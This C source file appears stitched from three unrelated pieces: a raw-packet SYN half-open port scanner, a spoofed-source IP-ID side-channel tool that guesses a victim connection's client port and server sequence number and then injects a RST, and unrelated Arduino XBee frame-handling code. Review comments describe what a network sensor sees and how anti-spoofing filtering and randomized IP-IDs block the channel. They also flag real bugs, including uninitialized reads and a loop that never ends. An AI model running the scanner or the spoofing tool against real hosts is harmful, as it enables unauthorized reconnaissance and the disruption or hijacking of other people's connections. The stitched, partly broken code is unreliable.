/*
 * Entry point: TCP SYN probe of a port range on a single destination host.
 *
 * Arguments (usage() is called when fewer than 5 are given):
 *   argv[1]  source IP                          -> ip
 *   argv[2]  destination IP                     -> dip
 *   argv[3]  first port; createSocket() gets it twice (local and remote port)
 *   argv[4]  last port                          -> eport
 *   argv[5]  gateway IP; its MAC is resolved by ARPRequest() into dmac
 *
 * Flow: if_menu() fills imac, the gateway MAC is resolved, ARPReply() is
 * called once, the TCPSocket is built, and the capture is filtered to "tcp".
 * Then, until a key is pressed: send one SYN for the next port, read the next
 * captured packet, and for any TCP segment carrying both SYN and ACK print
 * the source port, dump the layers and send a RST.
 *
 * From a monitoring point of view this is the half-open-scan pattern: a burst
 * of SYNs from one source, each SYN-ACK answered by a RST instead of an ACK.
 *
 * NOTE(review): ts.hostport++ runs on every loop iteration, also after the
 * range is exhausted, so the 16-bit counter wraps and probing restarts at
 * port 0 unless kbhit() stops the loop first.
 * NOTE(review): argv[3] and argv[4] go through atoi() with no range check.
 */
int main(int argc, char **argv)
{
    struct layer *head, *tcp;
    struct TCPSocket ts;
    struct MAC imac, dmac;
    uint32_t ip, dip, gip;
    uint16_t eport;
    int n;

    if (argc < 6)
        usage(*argv);
    /* if_menu() is expected to fill imac with the interface's MAC -- presumably interactive. */
    if (if_menu(&imac) < 0)
        exit(1);
    str_to_ip(argv[1], &ip);
    str_to_ip(argv[2], &dip);
    str_to_ip(argv[5], &gip);
    /* Resolve the gateway MAC into dmac; the trailing 5 looks like a timeout/retry count -- confirm in ARPRequest(). */
    if (ARPRequest(&imac, &dmac, ip, gip, 5) < 0) {
        fprintf(stderr, "error: no route to host.\n");
        exit(1);
    }
    ARPReply(&imac, ip, &dmac, gip);
    eport = atoi(argv[4]);
    /* Same value for the local and the remote port; see createSocket() for which is which. */
    createSocket(&ts, &imac, &dmac, ip, dip, atoi(argv[3]), atoi(argv[3]));
    filterDatalink("tcp");
    head = NULL;
    while (!kbhit()) {
        /* One SYN per iteration while the port counter is below eport (counter keeps incrementing afterwards). */
        if (ts.hostport++ < eport)
            SYN(&ts);
        if ((head = recvlayers(&n)) == NULL)
            continue;
        if ((tcp = findlayer(head, LT_TCP)) != NULL) {
            struct tcphdr *t;
            t = (xtcp)tcp->proto;
            /* SYN|ACK means the port answered; tear the half-open connection down with a RST. */
            if (((t->th_flags & TH_SYN) == TH_SYN) && ((t->th_flags & TH_ACK) == TH_ACK)) {
                printf("recv: SYN-ACK from port %d\n", ntohs(t->th_sport));
                printlayers(tcp);
                RST(&ts);
            }
        }
        rmlayers(head);
    }
    closeDatalink();
    exit(0);
}
/*
 * Entry point: IP-ID side-channel probe against a spoofed "client" host.
 *
 * Phase 1 -- guess the client's port: for every port in [start_port,
 * end_port] send one SYN with source spoof_ip to server_ip, wait, then read
 * spoof_ip's IP-ID counter with an ICMP echo (echo_get_id) and record the
 * change since the previous reading. The port with the smallest delta is
 * kept as guess_port; a delta of 0 is reported at once and ends the run.
 *
 * Phase 2 -- guess the server's sequence number: the socket is retargeted to
 * spoof_ip:guess_port -> server_ip:server_port and ACK segments are sent while
 * ts.seq steps down from 0xffffffff in 16384 steps, reading the IP-ID delta
 * after each; a delta of exactly 1 stops the search. With argv[9] given, only
 * serv_seq and serv_seq+65536 are tested instead. A RST ends both paths.
 *
 * Arguments (usage() is called when fewer than 8 are given):
 *   argv[1] capture interface name      argv[2] real (local) IP
 *   argv[3] gateway IP (stored in gw_ip, not used afterwards)
 *   argv[4] spoofed / client IP         argv[5] server IP
 *   argv[6] first port  argv[7] last port  argv[8] server port
 *   argv[9] optional known server sequence number (strtoul; 0 on error)
 *
 * What a network sensor sees: ICMP echo requests from real_ip to both hosts
 * interleaved with TCP SYN/ACK/RST segments whose source is spoof_ip. Ingress
 * anti-spoofing filtering on the segment this runs from, and per-destination
 * randomized IP-ID generation on the probed hosts, close the side channel.
 *
 * NOTE(review): dly_serv is never assigned but is printed and added to the
 * usleep() delay (uninitialized read, UB); the first echo_get_id() writes dly.
 * NOTE(review): guess_port = start_port runs before start_port is assigned.
 * NOTE(review): min_delta = -1 on an unsigned short yields 65535, used as the
 * "no measurement yet" sentinel.
 * NOTE(review): the phase-2 loop condition abs(end_guess-i) >= 0 is always
 * true (abs() never returns a negative value; INT_MIN is UB), so that loop
 * ends only through exit(); once i drops below 0 it wraps (unsigned).
 * NOTE(review): proto and client_ip are unused.
 */
int main(int argc, char **argv)
{
    struct layer *proto;                                   /* unused */
    struct MAC localmac, gwmac, cli_mac;
    uint32_t real_ip, spoof_ip, gw_ip, client_ip, server_ip, dly, dly_serv;
    struct TCPSocket ts;
    struct datalink icmp_dl, dl;                           /* dl: TCP sending; icmp_dl: echo-reply capture */
    uint16_t start_port, end_port, server_port, ip_id_a, ip_id_b, ip_id_d;
    unsigned long i;
    unsigned short guess_port, min_delta = -1;             /* -1 wraps to 65535: no minimum yet */
    unsigned long guess_serv_seq, serv_seq = 0;
    uint32_t start_guess, end_guess;
    int guess_inc;
    char icmp_filter[256];

    if (argc < 9)
        usage(*argv);
    /* Optional known server sequence; any strtoul error falls back to 0 (= unknown). */
    if (argc >= 10) {
        errno = 0;
        serv_seq = strtoul(argv[9], NULL, 10);
        if (errno)
            serv_seq = 0;
    }
    srand(time(NULL));                                      /* no rand() call in this function */
    memset(&dl, 0, sizeof(dl));
    if (if_openbyname(&dl, argv[1]) < 0) {
        fprintf(stderr, "open_link_byname failed\n");
        return 1;
    }
    memset(&icmp_dl, 0, sizeof(dl));                        /* sizeof(dl) -- same type as icmp_dl, so harmless */
    if (if_openbyname(&icmp_dl, argv[1]) < 0) {
        fprintf(stderr, "open_link_byname failed\n");
        return 1;
    }
    guess_port = start_port;                                /* start_port is still uninitialized here (see header) */
    str_to_ip(argv[2], &real_ip);
    str_to_ip(argv[3], &gw_ip);
    str_to_ip(argv[4], &spoof_ip);
    str_to_ip(argv[5], &server_ip);
    memcpy(&localmac.mac, dl.dl_mac, 6);
    /* Capture only echo replies (icmp[0] = 0) from the client or the server back to real_ip. */
    snprintf(icmp_filter, sizeof(icmp_filter),
             "icmp and icmp[0] = 0 and "
             "((src %s and dst %s) or (src %s and dst %s))",
             argv[4], argv[2], argv[5], argv[2]);
    filterDatalink(&icmp_dl, icmp_filter);
    /* On Ethernet, resolve the MACs used for the server (gwmac) and the client (cli_mac); trailing 5 presumably a timeout/retry count. */
    if (dl.dl_pcap->linktype == DLT_EN10MB) {
        if (ARPRequest(&dl, &localmac, &gwmac, real_ip, server_ip, 5) < 0) {
            fprintf(stderr, "lan gateway did not reply arp\n");
            exit(1);
        }
        if (ARPRequest(&dl, &localmac, &cli_mac, real_ip, spoof_ip, 5) < 0) {
            fprintf(stderr, "lan gateway did not reply arp\n");
            exit(1);
        }
    }
    start_port = atoi(argv[6]);                             /* no range checks on the three atoi() results */
    end_port = atoi(argv[7]);
    server_port = atoi(argv[8]);
    createSocket(&ts, &localmac, &gwmac, spoof_ip, server_ip, start_port, server_port);
    ts.rcvwin = 0;
    ip_id_a = ip_id_b = ip_id_d = 0;
    /* Baseline readings. NOTE(review): both calls write dly; dly_serv is printed/used uninitialized. */
    echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, server_ip, &dly, &ip_id_a);
    printf("delay to server= %lu\n", dly_serv);
    echo_get_id(&icmp_dl, &localmac, &cli_mac, real_ip, spoof_ip, &dly, &ip_id_a);
    printf("delay = %lu\n", dly);

    /* Phase 1: one spoofed SYN per port, then measure the client's IP-ID movement. */
    for (i = start_port; i <= end_port; i++) {
        SYN(&ts, &dl);
        usleep((dly + dly_serv));
        echo_get_id(&icmp_dl, &localmac, &cli_mac, real_ip, spoof_ip, &dly, &ip_id_b);
        ip_id_d = ip_id_b - ip_id_a;                        /* 16-bit wraparound-safe difference */
        ip_id_a = ip_id_b;
        if (ip_id_d < min_delta) {
            min_delta = ip_id_d;
            guess_port = i;
        }
        printf("for port %d ip_id delta = %x\n", ts.port, ip_id_d);
        if (ip_id_d == 0) {
            printf(" the client port is: %d\n", ts.port);
            exit(0);                                        /* datalinks are not closed on this path */
        }
        ts.port++;                                          /* ts.port tracks i; ts.seq advances with it */
        ts.seq++;
    }
    printf("guessed port is %d\n", guess_port);

    /* Phase 2: retarget the socket struct to the guessed client port. */
    ts.ip = server_ip;
    ts.port = server_port;
    ts.hostip = spoof_ip;
    ts.hostport = guess_port;
    printf("finding serv.seq using 16k window\n");
    min_delta = -1;                                         /* reset sentinel (65535) */
    if (serv_seq != 0) {
        /* Known-seq check: one ACK at serv_seq+65536, one at serv_seq, IP-ID delta after each.
         * NOTE(review): the two printf() labels are swapped relative to the ts.seq actually used. */
        ts.seq = serv_seq + 65536;
        ts.gatewaymac = cli_mac;
        /* Note: gwmac is passed for spoof_ip here, whereas phase 1 used cli_mac for the same host. */
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_a);
        ts.ack = 0;
        ACK(&ts, &dl);
        //ts.ack = 2<<30;
        //ACK(&ts,&dl);
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_b);
        ip_id_d = ip_id_b - ip_id_a;
        printf("for seq %lu delta = %d\n", serv_seq, ip_id_d);
        ts.seq = serv_seq;
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_a);
        ts.ack = 0;
        ACK(&ts, &dl);
        //ts.ack = 2<<30;
        //ACK(&ts,&dl);
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_b);
        ip_id_d = ip_id_b - ip_id_a;
        printf("for seq %lu delta = %d\n", serv_seq + 65536, ip_id_d);
        closeDatalink(&dl);
        closeDatalink(&icmp_dl);
        exit(0);
    }
    ip_id_a = ip_id_b = ip_id_d = 0;
    ts.gatewaymac = cli_mac;
    echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_a);
    /* Step ts.seq down from 0xffffffff in 16384 decrements; end_guess is never reached (see header). */
    start_guess = 0xffffffff;
    end_guess = 16385;
    guess_inc = -16384;
    for (i = start_guess; abs(end_guess - i) >= 0; i += guess_inc) {
        ts.ack = 0;
        ts.seq = i;
        ACK(&ts, &dl);
        //ts.ack = 2<<30;
        //ts.seq=i;
        /* NOTE(review): a second ACK with identical fields follows the commented-out lines above;
         * it may have been meant to stay commented out together with them -- confirm against the original layout. */
        ACK(&ts, &dl);
        echo_get_id(&icmp_dl, &localmac, &gwmac, real_ip, spoof_ip, &dly, &ip_id_b);
        ip_id_d = ip_id_b - ip_id_a;
        ip_id_a = ip_id_b;
        if (ip_id_d < min_delta) {
            min_delta = ip_id_d;
            guess_serv_seq = i;
            /* A delta of exactly 1 is treated as the hit: report, RST, done. */
            if (min_delta == 1) {
                printf("for seq %lu ip_id delta = %x\n", ts.seq, ip_id_d);
                RST(&ts, &dl);
                exit(0);
            }
        }
        printf("for seq %lu ip_id delta = %x\n", ts.seq, ip_id_d);
    }
    /* Only reached if the loop above ever terminates (it does not on its own). */
    printf("guessed sequence = %lu\n", guess_serv_seq);
    ts.seq = guess_serv_seq;
    RST(&ts, &dl);
    closeDatalink(&dl);
    closeDatalink(&icmp_dl);
    return 0;
}
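// Apply one decoded frame that carries a command for this module, then send
// the acknowledgement for the commands that expect one.
//   msgBuff          decoded frame; msgBuff[8] is the command id
//   data_start_index offset of the command payload inside msgBuff (already
//                    checked by the caller to lie within the decoded bytes)
static void DispatchLocalFrame(unsigned char *msgBuff, int data_start_index) {
  unsigned char cmd = msgBuff[8];

  switch (cmd) {
    case 0x01:
    case 0x02:
      // 0x01 sets manual control, 0x02 clears it; both update the room status.
      manual_control_flag = (cmd == 0x01) ? 1 : 0;
      ChangeRoomStatus(msgBuff, data_start_index);
      break;
    case 0x03:
      SyncRoomDateTime(msgBuff, data_start_index);
      break;
    case 0x04:
      // not yet coded (per the original author)
      RequestConsumption(msgBuff);
      break;
    case 0x07:
      ARPRequest(msgBuff);
      break;
    case 0x09:
      ScheduleFunction(msgBuff);
      break;
    case 0x0A:
      CheckRoomStatus(msgBuff, data_start_index);
      break;
    case 0x0C:
      ChangePort(msgBuff, data_start_index);
      break;
    default:
      // Unknown command: ignored, and not acknowledged below either.
      break;
  }

  // Only these commands are acknowledged; 0x07 and 0x0A are not.
  switch (cmd) {
    case 0x01:
    case 0x02:
    case 0x03:
    case 0x04:
    case 0x09:
    case 0x0C:
      SendAcknowledgement(msgBuff);
      break;
    default:
      break;
  }
}

// Drain the XBee serial port into RxQ, then decode every API frame (delimiter
// 0x7E) currently queued and either handle it here or forward it.
//
// Decoded-frame layout this function relies on:
//   msgBuff[8]   command id
//   msgBuff[9]   length byte; the payload starts at msgBuff[9] + 13
//   msgBuff[10]  must equal msgBuff[9] for the frame to be handled locally;
//                otherwise the frame goes to SendFrameToOtherModules()
//                (presumably a length check byte -- confirm against the
//                sender's frame format)
//
// Frames come in over the radio, so nothing about them is trusted: the
// header bytes are only read once the decoded frame is long enough to hold
// them, and a payload offset pointing past the decoded bytes drops the frame
// instead of handing the handlers an out-of-range index.
//
// Queue handling: delPos tracks how many queued bytes have been consumed
// (or found to be garbage before a delimiter); RxQ.Clear(delPos) discards
// exactly those at the end. An incomplete frame is left queued so the rest
// of it can arrive on the next call.
void ReadDataInBuffer() {
  const int CMD_IDX = 8;
  const int LEN_IDX = 9;
  const int LEN_CHECK_IDX = 10;
  const int HDR_LEN = 13;
  const int MIN_FRAME_LEN = LEN_CHECK_IDX + 1;  // enough to read msgBuff[8..10]

  int delPos = 0;

  // Move everything the radio has delivered into the queue; stop when the
  // queue is full and leave the remainder in the serial buffer.
  while (xbee_serial.available() > 0) {
    unsigned char in = (unsigned char)xbee_serial.read();
    if (!RxQ.Enqueue(in)) break;
  }

  int queueLen = RxQ.Size();
  for (int x = 0; x < queueLen; x++) {
    if (RxQ.Peek(x) != 0x7E) continue;  // 0x7E starts an API frame

    unsigned char checkBuff[Q_SIZE];
    unsigned char msgBuff[Q_SIZE];
    int checkLen = RxQ.Copy(checkBuff, x);
    int msgLen = xbee.Receive(checkBuff, checkLen, msgBuff);

    if (msgLen <= 0) {
      // Not a complete/valid frame yet: keep it queued, but drop whatever
      // preceded the delimiter.
      if (x > 0) delPos = x - 1;
      continue;
    }

    if (msgLen >= MIN_FRAME_LEN) {
      int data_start_index = ((int)msgBuff[LEN_IDX]) + HDR_LEN;
      if (msgBuff[LEN_IDX] != msgBuff[LEN_CHECK_IDX]) {
        // Not addressed to this module: hand it on unchanged.
        SendFrameToOtherModules(msgBuff);
      } else if (data_start_index <= msgLen) {
        DispatchLocalFrame(msgBuff, data_start_index);
      }
      // else: payload offset lies beyond the decoded bytes -> malformed, dropped.
    }
    // else: too short to carry the command/length bytes -> malformed, dropped.

    // Skip past the consumed frame; everything up to here can be cleared.
    x += msgLen;
    delPos = x;
  }

  RxQ.Clear(delPos);
}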